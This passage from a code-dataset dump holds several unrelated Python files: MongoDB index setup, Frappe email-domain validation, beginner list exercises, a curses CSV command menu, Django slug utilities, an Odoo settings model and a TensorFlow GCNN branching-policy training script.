il.load_item()","sub_path":"all_spider/AI_32/ny_sos_companies_business_licenses.py","file_name":"ny_sos_companies_business_licenses.py","file_ext":"py","file_size_in_byte":7525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"423439901","text":"from __future__ import print_function\nimport itertools\nfrom pupa.core import db\nfrom .base import BaseCommand\nfrom pymongo import ASCENDING, DESCENDING\n\n\nclass Command(BaseCommand):\n name = 'ensure-indexes'\n help = '''make mongodb indexes'''\n\n def add_args(self):\n self.add_argument('collections', nargs='*',\n help='collections to index (default: all')\n self.add_argument('--purge', action='store_true', default=False,\n help='purge old indexes')\n\n def handle(self, args):\n all_indexes = {\n 'jurisdictions': [\n [('name', ASCENDING)]\n ],\n 'organizations': [],\n 'people': [],\n 'memberships': [\n # get all members for an org\n [('organization_id', ASCENDING), ('end_date', ASCENDING)],\n # get all memberships for a person\n [('person_id', ASCENDING), ('end_date', ASCENDING)],\n ],\n 'bills': [],\n 'events': [],\n 'votes': [],\n }\n api_indexes = {\n 'organizations': [\n ['jurisdiction_id'],\n ['classification'],\n ['parent_id'],\n ['division_id'],\n ['identifiers.scheme', 'identifiers.identifier'],\n [],\n ],\n 'people': [\n ['identifiers.scheme', 'identifiers.identifier'],\n [],\n ],\n 'bills': [\n ['jurisdiction_id'],\n ['identifiers.scheme', 'identifiers.identifier'],\n [],\n ],\n 'events': [\n ['jurisdiction_id'],\n ['participants.id'],\n ['agenda.related_entities.id'],\n [],\n ],\n 'votes': [\n ['jurisdiction_id'],\n ['session'],\n ['bill.id'],\n ],\n }\n\n for _type, indexes in api_indexes.items():\n for fields in indexes:\n real_index = zip(fields, itertools.repeat(ASCENDING))\n all_indexes[_type].append(real_index +\n [('created_at', DESCENDING)])\n all_indexes[_type].append(real_index +\n [('updated_at', DESCENDING)])\n if _type == 'events':\n all_indexes[_type].append(real_index +\n [('when', DESCENDING)])\n if _type == 'date':\n all_indexes[_type].append(real_index +\n [('date', DESCENDING)])\n\n collections = args.collections or all_indexes.keys()\n\n for collection in collections:\n print('indexing', collection, '...')\n current = set(db[collection].index_information().keys())\n current.discard('_id_')\n # if collection == 'bills':\n # # basic lookup / unique constraint on abbr/session/bill_id\n # current.discard('%s_1_session_1_chamber_1_bill_id_1' %\n # settings.LEVEL_FIELD)\n # db.bills.ensure_index([\n # (settings.LEVEL_FIELD, pymongo.ASCENDING),\n # ('session', pymongo.ASCENDING),\n # ('chamber', pymongo.ASCENDING),\n # ('bill_id', pymongo.ASCENDING)\n # ], unique=True)\n # print('creating level-session-chamber-bill_id index')\n print('currently has', len(current), 'indexes (not counting _id)')\n print('ensuring', len(all_indexes[collection]), 'indexes')\n ensured = set()\n for index in all_indexes[collection]:\n if isinstance(index, list):\n ensured.add(db[collection].ensure_index(index))\n elif isinstance(index, dict):\n name, index_spec = index.items()[0]\n ensured.add(\n db[collection].ensure_index(index_spec, name=name))\n else:\n raise ValueError(index)\n new = ensured - current\n old = current - ensured\n if len(new):\n print(len(new), 'new indexes:', ', '.join(new))\n if len(old):\n print(len(old), 'indexes deprecated:', ', '.join(old))\n if args.purge:\n print('removing deprecated indexes...')\n for index in old:\n db[collection].drop_index(index)\n","sub_path":"pupa/cli/commands/ensure_indexes.py","file_name":"ensure_indexes.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"357385165","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe import _\nfrom frappe.model.document import Document\nfrom frappe.utils import validate_email_address ,cint\nimport imaplib,poplib,smtplib\nfrom frappe.email.utils import get_port\n\nclass EmailDomain(Document):\n\tdef autoname(self):\n\t\tif self.domain_name:\n\t\t\tself.name = self.domain_name\n\n\tdef validate(self):\n\t\t\"\"\"Validate email id and check POP3/IMAP and SMTP connections is enabled.\"\"\"\n\t\tif self.email_id:\n\t\t\tvalidate_email_address(self.email_id, True)\n\n\t\tif frappe.local.flags.in_patch or frappe.local.flags.in_test:\n\t\t\treturn\n\n\t\tif not frappe.local.flags.in_install and not frappe.local.flags.in_patch:\n\t\t\ttry:\n\t\t\t\tif self.use_imap:\n\t\t\t\t\tif self.use_ssl:\n\t\t\t\t\t\ttest = imaplib.IMAP4_SSL(self.email_server, port=get_port(self))\n\t\t\t\t\telse:\n\t\t\t\t\t\ttest = imaplib.IMAP4(self.email_server, port=get_port(self))\n\n\t\t\t\telse:\n\t\t\t\t\tif self.use_ssl:\n\t\t\t\t\t\ttest = poplib.POP3_SSL(self.email_server, port=get_port(self))\n\t\t\t\t\telse:\n\t\t\t\t\t\ttest = poplib.POP3(self.email_server, port=get_port(self))\n\n\t\t\texcept Exception:\n\t\t\t\tfrappe.throw(_(\"Incoming email account not correct\"))\n\t\t\t\treturn None\n\t\t\tfinally:\n\t\t\t\ttry:\n\t\t\t\t\tif self.use_imap:\n\t\t\t\t\t\ttest.logout()\n\t\t\t\t\telse:\n\t\t\t\t\t\ttest.quit()\n\t\t\t\texcept Exception:\n\t\t\t\t\tpass\n\t\t\ttry:\n\t\t\t\tif self.use_tls and not self.smtp_port:\n\t\t\t\t\tself.smtp_port = 587\n\t\t\t\tsess = smtplib.SMTP((self.smtp_server or \"\").encode('utf-8'), cint(self.smtp_port) or None)\n\t\t\t\tsess.quit()\n\t\t\texcept Exception:\n\t\t\t\tfrappe.throw(_(\"Outgoing email account not correct\"))\n\t\t\t\treturn None\n\t\treturn\n\n\tdef on_update(self):\n\t\t\"\"\"update all email accounts using this domain\"\"\"\n\t\tfor email_account in frappe.get_all(\"Email Account\",\n\t\tfilters={\"domain\": self.name}):\n\n\t\t\ttry:\n\t\t\t\temail_account = frappe.get_doc(\"Email Account\",\n\t\t\t\t\temail_account.name)\n\t\t\t\temail_account.set(\"email_server\",self.email_server)\n\t\t\t\temail_account.set(\"use_imap\",self.use_imap)\n\t\t\t\temail_account.set(\"use_ssl\",self.use_ssl)\n\t\t\t\temail_account.set(\"use_tls\",self.use_tls)\n\t\t\t\temail_account.set(\"attachment_limit\",self.attachment_limit)\n\t\t\t\temail_account.set(\"smtp_server\",self.smtp_server)\n\t\t\t\temail_account.set(\"smtp_port\",self.smtp_port)\n\t\t\t\temail_account.save()\n\t\t\texcept Exception as e:\n\t\t\t\tfrappe.msgprint(email_account.name)\n\t\t\t\tfrappe.throw(e)\n\t\t\t\treturn None\n","sub_path":"frappe/email/doctype/email_domain/email_domain.py","file_name":"email_domain.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"164339602","text":"__author__ = 'Арминэ Мороз'\n\n# Задача-1:\n# Дан список фруктов.\n# Напишите программу, выводящую фрукты в виде нумерованного списка,\n# выровненного по правой стороне.\nprint('Task 1')\nfruit_list = [\"яблоко\", \"банан\", \"киви\", \"арбуз\"]\n\nfor fruit in fruit_list:\n print('{}. {:>6}'.format(fruit_list.index(fruit) + 1,fruit))\n# Пример:\n# Дано: [\"яблоко\", \"банан\", \"киви\", \"арбуз\"]\n# Вывод:\n# 1. яблоко\n# 2. банан\n# 3. киви\n# 4. арбуз\n\n# Подсказка: воспользоваться методом .format()\n\nprint('Task 2')\n# Задача-2:\n# Даны два произвольные списка.\n# Удалите из первого списка элементы, присутствующие во втором списке и выведите результат.\nrandom_list1 = [7, 9.6, 'word', 86, 'smth', 1.8, 'dunno', 7, 53, 7, 7.6, 'oh7']\nrandom_list2 = ['look', 'string', 7, 'stock', 90, 1.8, 'smth']\n\nfor el_2 in random_list2:\n for el_1 in random_list1:\n if el_1 == el_2:\n random_list1.remove(el_1)\n else:\n continue\n\nprint(random_list1)\n\nprint('Task 3')\n# Задача-3:\n# Дан произвольный список из целых чисел.\n# Получите НОВЫЙ список из элементов исходного, выполнив следующие условия:\n# если элемент кратен двум, то разделить его на 4, если не кратен, то умножить на два.\n# и выведите результат\n\ninteger_list = [7, 96, 80, 7, -53, 6, 41, -22]\ninteger_new_list = []\n\nfor i in integer_list:\n if i%2 == 0:\n i = i/4\n integer_new_list.append(i)\n else:\n i = i*2\n integer_new_list.append(i)\n\nprint(integer_new_list)","sub_path":"lesson02_easy.py","file_name":"lesson02_easy.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"170492308","text":"import math\n\ndef f(z):\n return math.log(z)+z\n\ndef search_local_section(a, h):\n b = a + h\n fa = f(a)\n fb = f(b)\n if (abs(fb) > abs(fa))&(fa * fb > 0):\n h = - h\n b = a + h\n fb = f(b)\n while fa * fb > 0:\n a = b\n b = a + h\n fa = f(a)\n fb = f(b)\n return b\n\ndef iterate(a, b, eps):\n while True:\n x = (b + a)/2\n fa = f(a)\n fx = f(x)\n if fx * fa > 0:\n a = x\n else:\n b = x\n if abs(fx) < eps:\n return x\n\n\nif __name__ == '__main__':\n a = 0.1\n h = 0.1\n eps = 0.01\n x = iterate(a, search_local_section(a, h), eps)\n print(str(x))\n res = f(x)\n print(str(res))","sub_path":"lab2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"30628035","text":"import sys\nimport curses\nfrom curses import panel\nimport csv\nimport os\n\nglobal target\ntarget = \"\"\n\nglobal current_title\ncurrent_title = \"\"\n\nglobal title_to_cmd\ntitle_to_cmd = dict()\n\nclass Menu(object):\n\n def __init__(self, items, stdscreen):\n #TODO auto detect letters and bind letter to the item\n # make new container auto turned into\n # [m]ake new container\n\n self.window = stdscreen.subwin(0,0)\n self.window.keypad(1)\n self.panel = panel.new_panel(self.window)\n self.panel.hide()\n panel.update_panels()\n global target\n self.target = target\n\n self.position = 0\n\n #get numbers to exectue\n self.numbers_to_listen_to = list(range(1,len(items)+2))\n self.numbers_to_listen_to = list(range(1,len(items)+2))\n if len(self.numbers_to_listen_to) > 9:\n self.numbers_to_listen_to = self.numbers_to_listen_to[:9]\n\n self.letters_to_listen_to = []\n\n self.temp_items = []\n for item in items:\n i = 0\n title = item[0]\n next_item = False\n for letter in title:\n\n if not (letter.lower() in set(self.letters_to_listen_to)) and (not next_item):\n self.letters_to_listen_to.append(letter.lower())\n\n new_title = str(title[:i])+\"[\"+letter+\"]\"+str(title[i+1:])\n self.temp_items.append((new_title,item[1]))\n\n\n next_item = True\n break\n i+=1\n\n self.items = self.temp_items\n\n runner = sys_runner()\n self.items.append(('exit',runner.exit))\n\n def navigate(self, n):\n self.position += n\n if self.position < 0:\n self.position = 0\n elif self.position >= len(self.items):\n self.position = len(self.items)-1\n\n def get_target(self):\n #TODO make rm the .json or .csv and just name of what the menu is\n return str(self.target)\n\n def display(self):\n self.panel.top()\n self.panel.show()\n self.window.clear()\n self.window.addstr(\" \"+os.path.basename(self.get_target()).replace(\".csv\",\"\"))\n global current_title\n\n while True:\n self.window.refresh()\n curses.doupdate()\n for index, item in enumerate(self.items):\n if index == self.position:\n mode = curses.A_REVERSE\n else:\n mode = curses.A_NORMAL\n\n msg = '%d. %s' % (index+1, item[0])\n self.window.addstr(2+index, 1, msg, mode)\n\n key = self.window.getch()\n\n if key in [curses.KEY_ENTER, ord('\\n')]:\n if self.position == len(self.items)-1:#if its the exit button\n break\n else:\n #TODO make it call a thing instead\n\n #TODO 1st make it print what the cmd is\n self.target = self.items[self.position]\n #print(self.target)\n current_title = self.items[self.position][0]\n self.items[self.position][1]()\n\n elif key == curses.KEY_UP:\n self.navigate(-1)\n\n elif key == curses.KEY_DOWN:\n self.navigate(1)\n\n else:\n #print(\"key was\",key)\n #print(self.letters_to_listen_to)\n #print(self.numbers_to_listen_to)\n #print(self.items)\n for n in self.numbers_to_listen_to:\n if key == ord(str(n)):\n #print(\"dIng\")\n #print(self.position)\n #run item at n\n current_title = self.items[n-1][0]\n self.items[n-1][1]()\n\n for l in self.letters_to_listen_to:\n if key == ord(str(l)):\n # print(\"dIng\")\n # print(self.position)\n # run item at n\n current_title = self.items[self.letters_to_listen_to.index(l)][0]\n self.items[self.letters_to_listen_to.index(l)][1]()\n\n #if key in [for n in self.numbers_to_listen_to:ord(n)]\n\n self.window.clear()\n self.panel.hide()\n panel.update_panels()\n curses.doupdate()\n\nclass csv_shit(object):\n def write_test(self):\n with open('eggs.csv', 'w', newline='') as csvfile:\n spamwriter = csv.writer(csvfile, delimiter=' ',\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\n spamwriter.writerow(['Spam'] * 5 + ['Baked Beans'])\n spamwriter.writerow(['Spam', 'Lovely Spam', 'Wonderful Spam'])\n\n def read(self,file_to_read):\n titles = []\n cmds = []\n #stay_in_menu = []\n\n with open(file_to_read, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n print(\"contents of two.csv\")\n for row in reader:\n titles.append(row[0])\n cmds.append(row[1])\n #stay_in_menu.append([2])\n title_to_cmd[row[0]] = row[1]\n print(''.join(row))\n\n return titles,cmds#,stay_in_menu\n\n def make_menu(self,titles,cmds):\n runner = sys_runner()\n menu_items = []\n #TODO make menu objects callable things\n for title,cmd in zip(titles,cmds):\n temp_tuple = (str(title),runner.run)\n menu_items.append(temp_tuple)\n return menu_items\n\n\nclass sys_runner(object):\n def run(self,stay_in_menu=0):\n #TODO if stay in menu then print output in display fucntion\n # if not then exit menu and run\n print(\"running\")\n global current_title,title_to_cmd\n #put title back to normal\n current_title = current_title.replace(\"[\",\"\").replace(\"]\",\"\")\n print(current_title)\n print(title_to_cmd[current_title])\n\n #if there are arguments to pass to scrpts do it\n command_to_write = title_to_cmd[current_title]\n if len(sys.argv) > 2:\n args_to_add = sys.argv[2:]\n command_to_write+=\" \"+\" \".join(args_to_add)\n print(command_to_write)\n with open(\"temp\",\"w\") as temp:\n temp.write(str(command_to_write))\n temp.close()\n exit(0)\n #TODO make it make temp\n\n\n def exit(self):\n exit(0)\n return\n\nclass MyApp(object):\n\n def __init__(self, stdscreen):\n self.screen = stdscreen\n curses.curs_set(0)\n\n csv_obj = csv_shit()\n\n titles, cmds = csv_obj.read(target)\n menu_items = csv_obj.make_menu(titles, cmds)\n\n main_menu = Menu(menu_items, self.screen)\n main_menu.display()\n\n\n\nif __name__ == '__main__':\n #TODO make pass any args onwards\n #print (\"This is the name of the script: \", sys.argv[0])\n #print(\"all args are\",sys.argv)\n if len(sys.argv) >= 2:\n target = sys.argv[1]\n curses.wrapper(MyApp)\n else:\n print(\"Must specify a csv to menu\")","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":7126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"592220793","text":"# implement the simplest way of selecting the k-th minimum\nimport sys, os, time, random\nif os.getcwd() not in sys.path:\n sys.path.append(os.getcwd())\n\nfrom k_min_count import Kmin\nfrom k_min import KMin\n\n\n##a = [5, 2, 3, 6, 1, 4]\n##k = 6\n\nfor i in range(1,7):\n o = 10**i\n a = random.sample(range(o*2), o)\n k = int(random.random()*i*10) + 1\n\n\n s = time.clock()\n by_count = Kmin.kthM(a, k)\n ec = round(time.clock() - s, 5)\n \n t = time.clock()\n by_heap = KMin.kthMinimum(a, k)\n eh = round(time.clock() - t, 5)\n\n if by_count != by_heap:\n print ('ERROR')\n else:\n print (o, k, ec, eh)\n","sub_path":"week2/7-K-Min/benchmark/k_min_test.py","file_name":"k_min_test.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"398922265","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.db.models.base import ModelBase\nfrom django.utils.safestring import mark_safe\nfrom django.template.defaultfilters import yesno, linebreaksbr, urlize\nfrom django.utils.formats import get_format\nfrom django.utils.text import capfirst\nfrom django.utils import dateformat\nfrom django.template.defaultfilters import slugify\nimport datetime, re, logging, random, string, os\n\ntry:\n from collections import namedtuple\nexcept ImportError:\n # Python 2.4, 2.5 backport:\n # http://code.activestate.com/recipes/500261/\n from artminster.core.utils.namedtuple import namedtuple\n\ndef get_namedtuple_choices(name, choices_tuple):\n \"\"\"Factory function for quickly making a namedtuple suitable for use in a\n Django model as a choices attribute on a field. It will preserve order.\n\n Usage::\n\n class MyModel(models.Model):\n COLORS = get_namedtuple_choices('COLORS', (\n (0, 'BLACK', 'Black'),\n (1, 'WHITE', 'White'),\n ))\n colors = models.PositiveIntegerField(choices=COLORS)\n\n >>> MyModel.COLORS.BLACK\n 0\n >>> MyModel.COLORS.get_choices()\n [(0, 'Black'), (1, 'White')]\n \"\"\"\n class Choices(namedtuple(name, [name for val,name,desc in choices_tuple])):\n __slots__ = ()\n _choices = tuple([desc for val,name,desc in choices_tuple])\n\n def get_choices(self):\n return zip(tuple(self), self._choices)\n\n return Choices._make([val for val,name,desc in choices_tuple])\n\ndef unique_slugify(instance, value, slug_field_name='slug', queryset=None, slug_separator='-'):\n \"\"\"\n Calculates a unique slug of ``value`` for an instance.\n\n ``slug_field_name`` should be a string matching the name of the field to\n store the slug in (and the field to check against for uniqueness).\n\n ``queryset`` usually doesn't need to be explicitly provided - it'll default\n to using the ``.all()`` queryset from the model's default manager.\n \"\"\"\n slug_field = instance._meta.get_field(slug_field_name)\n\n slug = getattr(instance, slug_field.attname)\n slug_len = slug_field.max_length\n\n # Sort out the initial slug. Chop its length down if we need to.\n slug = slugify(value)\n if slug_len:\n slug = slug[:slug_len]\n slug = _slug_strip(slug, slug_separator)\n original_slug = slug\n\n # Create a queryset, excluding the current instance.\n if queryset is None:\n queryset = instance.__class__._default_manager.all()\n if instance.pk:\n queryset = queryset.exclude(pk=instance.pk)\n\n # Find a unique slug. If one matches, at '-2' to the end and try again\n # (then '-3', etc).\n next = 2\n while not slug or queryset.filter(**{slug_field_name: slug}):\n slug = original_slug\n end = '-%s' % next\n if slug_len and len(slug) + len(end) > slug_len:\n slug = slug[:slug_len-len(end)]\n slug = _slug_strip(slug, slug_separator)\n slug = '%s%s' % (slug, end)\n next += 1\n \n setattr(instance, slug_field.attname, slug)\n\ndef _slug_strip(value, separator=None):\n \"\"\"\n Cleans up a slug by removing slug separator characters that occur at the\n beginning or end of a slug.\n\n If an alternate separator is used, it will also replace any instances of\n the default '-' separator with the new separator.\n \"\"\"\n if separator == '-' or not separator:\n re_sep = '-'\n else:\n re_sep = '(?:-|%s)' % re.escape(separator)\n value = re.sub('%s+' % re_sep, separator, value)\n return re.sub(r'^%s+|%s+$' % (re_sep, re_sep), '', value)\n\ndef get_or_none(model, **kwargs):\n try:\n return model.objects.get(**kwargs)\n except model.DoesNotExist:\n return None\t\t\n\ndef get_upload_to(instance, path, filename):\n name, ext = os.path.splitext(filename)\n name = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(20))\n new_filename = '%s%s' % (name, ext.lower())\n return os.path.join(path, new_filename)","sub_path":"core/utils/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"310476758","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nfrom odoo import api, fields, models\n\n\nclass ResConfigSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n @api.model\n def execute_config(self):\n config_id = self.env['res.config.settings'].search([], limit=1, order='id desc')\n if config_id:\n config_rec = self.env['res.config.settings'].browse(config_id.id)\n config_rec.write({\n 'group_stock_multi_locations': True,\n 'group_stock_multi_warehouses': True,\n 'group_stock_production_lot': True,\n 'group_product_variant': True,\n 'group_stock_adv_location': True,\n })\n config_rec.execute()\n else:\n config_params = self.env['res.config.settings'].create({})\n config_params.write({\n 'group_stock_multi_locations': True,\n 'group_stock_multi_warehouses': True,\n 'group_stock_production_lot': True,\n 'group_product_variant': True,\n 'group_stock_adv_location': True,\n })\n config_params.execute()\n","sub_path":"manage/models/res_config_settings_models.py","file_name":"res_config_settings_models.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"35486420","text":"import os\nimport importlib\nimport argparse\nimport sys\nimport pathlib\nimport pickle\nimport numpy as np\nfrom time import strftime\nfrom shutil import copyfile\nimport gzip\n\nimport tensorflow as tf\nimport tensorflow.contrib.eager as tfe\n\nimport utilities\nfrom utilities import log\n\n\ndef load_batch(sample_files):\n \"\"\"\n Loads and concatenates a bunch of samples into one mini-batch.\n \"\"\"\n c_features = []\n e_indices = []\n e_features = []\n v_features = []\n cand_actionss = []\n expert_actions = []\n\n # load samples\n for filename in sample_files:\n with gzip.open(filename, 'rb') as f:\n sample = pickle.load(f)\n\n state, khalil_state, expert_action, cand_actions, *_ = sample['data']\n\n cand_actions = np.array(cand_actions)\n expert_action = np.where(cand_actions == expert_action)[0][0] # best action relative to candidates\n\n c, e, v = state\n c_features.append(c['values'])\n e_indices.append(e['indices'])\n e_features.append(e['values'])\n v_features.append(v['values'])\n expert_actions.append(expert_action)\n cand_actionss.append(cand_actions)\n\n n_cs_per_sample = [c.shape[0] for c in c_features]\n n_vs_per_sample = [v.shape[0] for v in v_features]\n n_cands_per_sample = [cands.shape[0] for cands in cand_actionss]\n\n # concatenate samples in one big graph\n c_features = np.concatenate(c_features, axis=0)\n v_features = np.concatenate(v_features, axis=0)\n e_features = np.concatenate(e_features, axis=0)\n # edge indices have to be adjusted accordingly\n cv_shift = np.cumsum([\n [0] + n_cs_per_sample[:-1],\n [0] + n_vs_per_sample[:-1]\n ], axis=1)\n e_indices = np.concatenate([e_ind + cv_shift[:, j:(j+1)]\n for j, e_ind in enumerate(e_indices)], axis=1)\n # candidate indexes as well\n cand_actionss = np.concatenate([cands + shift\n for cands, shift in zip(cand_actionss, cv_shift[1])])\n expert_actions = np.array(expert_actions)\n\n # convert to tensors\n c_features = tf.convert_to_tensor(c_features, dtype=tf.float32)\n e_indices = tf.convert_to_tensor(e_indices, dtype=tf.int32)\n e_features = tf.convert_to_tensor(e_features, dtype=tf.float32)\n v_features = tf.convert_to_tensor(v_features, dtype=tf.float32)\n n_cs_per_sample = tf.convert_to_tensor(n_cs_per_sample, dtype=tf.int32)\n n_vs_per_sample = tf.convert_to_tensor(n_vs_per_sample, dtype=tf.int32)\n expert_actions = tf.convert_to_tensor(expert_actions, dtype=tf.int32)\n cand_actionss = tf.convert_to_tensor(cand_actionss, dtype=tf.int32)\n n_cands_per_sample = tf.convert_to_tensor(n_cands_per_sample, dtype=tf.int32)\n\n return c_features, e_indices, e_features, v_features, n_cs_per_sample, n_vs_per_sample, n_cands_per_sample, cand_actionss, expert_actions\n\n\ndef load_batch_tf(x):\n return tf.py_func(\n load_batch,\n [x],\n [tf.float32, tf.int32, tf.float32, tf.float32, tf.int32, tf.int32, tf.int32, tf.int32, tf.int32])\n\n\ndef pretrain(model, dataloader):\n \"\"\"\n Pre-normalizes a model (i.e., PreNormLayer layers) over the given samples.\n\n Parameters\n ----------\n model : model.BaseModel\n A base model, which may contain some model.PreNormLayer layers.\n dataloader : tf.data.Dataset\n Dataset to use for pre-training the model.\n Return\n ------\n number of PreNormLayer layers processed.\n \"\"\"\n model.pre_train_init()\n i = 0\n while True:\n for batch in dataloader:\n c, ei, ev, v, n_cs, n_vs, n_cands, cands, actions = batch\n batched_states = (c, ei, ev, v, n_cs, n_vs)\n\n if not model.pre_train(batched_states):\n break\n\n res = model.pre_train_next()\n if res is None:\n break\n else:\n layer, name = res\n\n i += 1\n\n return i\n\n\ndef process(model, dataloader, top_k, optimizer=None):\n mean_loss = 0\n mean_kacc = np.zeros(len(top_k))\n\n n_samples_processed = 0\n for batch in dataloader:\n c, ei, ev, v, n_cs, n_vs, n_cands, cands, actions = batch\n batched_states = (c, ei, ev, v, tf.reduce_sum(n_cs, keepdims=True), tf.reduce_sum(n_vs, keepdims=True)) # prevent padding\n batch_size = len(n_cs.numpy())\n\n if optimizer:\n with tf.GradientTape() as tape:\n logits = model(batched_states)\n logits = tf.expand_dims(tf.gather(tf.squeeze(logits, 0), cands), 0) # filter candidate variables\n logits = model.pad_output(logits, n_cands.numpy()) # apply padding now\n loss = tf.losses.sparse_softmax_cross_entropy(labels=actions, logits=logits)\n grads = tape.gradient(target=loss, sources=model.variables)\n optimizer.apply_gradients(zip(grads, model.variables))\n else:\n logits = model(batched_states)\n logits = tf.expand_dims(tf.gather(tf.squeeze(logits, 0), cands), 0) # filter candidate variables\n logits = model.pad_output(logits, n_cands.numpy()) # apply padding now\n loss = tf.losses.sparse_softmax_cross_entropy(labels=actions, logits=logits)\n\n kacc = np.array([\n tf.reduce_mean(tf.cast(tf.nn.in_top_k(predictions=logits, targets=actions, k=k), tf.float32)).numpy()\n for k in top_k\n ])\n mean_loss += loss.numpy() * batch_size\n mean_kacc += kacc * batch_size\n n_samples_processed += batch_size\n\n mean_loss /= n_samples_processed\n mean_kacc /= n_samples_processed\n\n return mean_loss, mean_kacc\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'problem',\n help='MILP instance type to process.',\n choices=['setcover', 'cauctions', 'facilities'],\n )\n parser.add_argument(\n '-m', '--model',\n help='GCNN model to be trained.',\n type=str,\n default='baseline',\n )\n parser.add_argument(\n '-s', '--seed',\n help='Random generator seed.',\n type=utilities.valid_seed,\n default=0,\n )\n parser.add_argument(\n '-g', '--gpu',\n help='CUDA GPU id (-1 for CPU).',\n type=int,\n default=0,\n )\n args = parser.parse_args()\n\n ### HYPER PARAMETERS ###\n max_epochs = 1000\n epoch_size = 312\n batch_size = 32\n pretrain_batch_size = 128\n valid_batch_size = 128\n lr = 0.001\n patience = 10\n early_stopping = 20\n top_k = [1, 3, 5, 10]\n\n if args.problem == 'setcover':\n train_files = list(pathlib.Path('data/samples/setcover/500r_1000c_0.05d/train').glob('sample_*.pkl'))\n valid_files = list(pathlib.Path('data/samples/setcover/500r_1000c_0.05d/valid').glob('sample_*.pkl'))\n\n elif args.problem == 'cauctions':\n train_files = list(pathlib.Path('data/samples/cauctions/100_500/train').glob('sample_*.pkl'))\n valid_files = list(pathlib.Path('data/samples/cauctions/100_500/valid').glob('sample_*.pkl'))\n\n elif args.problem == 'facilities':\n train_files = list(pathlib.Path('data/samples/facilities/100_100_5/train').glob('sample_*.pkl'))\n valid_files = list(pathlib.Path('data/samples/facilities/100_100_5/valid').glob('sample_*.pkl'))\n\n else:\n raise NotImplementedError\n\n running_dir = f\"trained_models/{args.problem}/{args.model}/{args.seed}\"\n\n os.makedirs(running_dir)\n\n ### LOG ###\n logfile = os.path.join(running_dir, 'log.txt')\n\n log(f\"max_epochs: {max_epochs}\", logfile)\n log(f\"epoch_size: {epoch_size}\", logfile)\n log(f\"batch_size: {batch_size}\", logfile)\n log(f\"pretrain_batch_size: {pretrain_batch_size}\", logfile)\n log(f\"valid_batch_size : {valid_batch_size }\", logfile)\n log(f\"lr: {lr}\", logfile)\n log(f\"patience : {patience }\", logfile)\n log(f\"early_stopping : {early_stopping }\", logfile)\n log(f\"top_k: {top_k}\", logfile)\n log(f\"problem: {args.problem}\", logfile)\n log(f\"gpu: {args.gpu}\", logfile)\n log(f\"seed {args.seed}\", logfile)\n\n ### NUMPY / TENSORFLOW SETUP ###\n if args.gpu == -1:\n os.environ['CUDA_VISIBLE_DEVICES'] = ''\n else:\n os.environ['CUDA_VISIBLE_DEVICES'] = f'{args.gpu}'\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n tf.enable_eager_execution(config)\n tf.executing_eagerly()\n\n rng = np.random.RandomState(args.seed)\n tf.set_random_seed(rng.randint(np.iinfo(int).max))\n\n ### SET-UP DATASET ###\n log(f\"{len(train_files)} training samples\", logfile)\n log(f\"{len(valid_files)} validation samples\", logfile)\n\n train_files = [str(x) for x in train_files]\n valid_files = [str(x) for x in valid_files]\n\n valid_data = tf.data.Dataset.from_tensor_slices(valid_files)\n valid_data = valid_data.batch(valid_batch_size)\n valid_data = valid_data.map(load_batch_tf)\n valid_data = valid_data.prefetch(1)\n\n pretrain_files = [f for i, f in enumerate(train_files) if i % 10 == 0]\n pretrain_data = tf.data.Dataset.from_tensor_slices(pretrain_files)\n pretrain_data = pretrain_data.batch(pretrain_batch_size)\n pretrain_data = pretrain_data.map(load_batch_tf)\n pretrain_data = pretrain_data.prefetch(1)\n\n ### MODEL LOADING ###\n sys.path.insert(0, os.path.abspath(f'models/{args.model}'))\n import model\n importlib.reload(model)\n model = model.GCNPolicy()\n del sys.path[0]\n\n ### TRAINING LOOP ###\n optimizer = tf.train.AdamOptimizer(learning_rate=lambda: lr) # dynamic LR trick\n best_loss = np.inf\n for epoch in range(max_epochs + 1):\n log(f\"EPOCH {epoch}...\", logfile)\n epoch_loss_avg = tfe.metrics.Mean()\n epoch_accuracy = tfe.metrics.Accuracy()\n\n # TRAIN\n if epoch == 0:\n n = pretrain(model=model, dataloader=pretrain_data)\n log(f\"PRETRAINED {n} LAYERS\", logfile)\n # model compilation\n model.call = tfe.defun(model.call, input_signature=model.input_signature)\n else:\n # bugfix: tensorflow's shuffle() seems broken...\n epoch_train_files = rng.choice(train_files, epoch_size * batch_size, replace=True)\n train_data = tf.data.Dataset.from_tensor_slices(epoch_train_files)\n train_data = train_data.batch(batch_size)\n train_data = train_data.map(load_batch_tf)\n train_data = train_data.prefetch(1)\n train_loss, train_kacc = process(model, train_data, top_k, optimizer)\n log(f\"TRAIN LOSS: 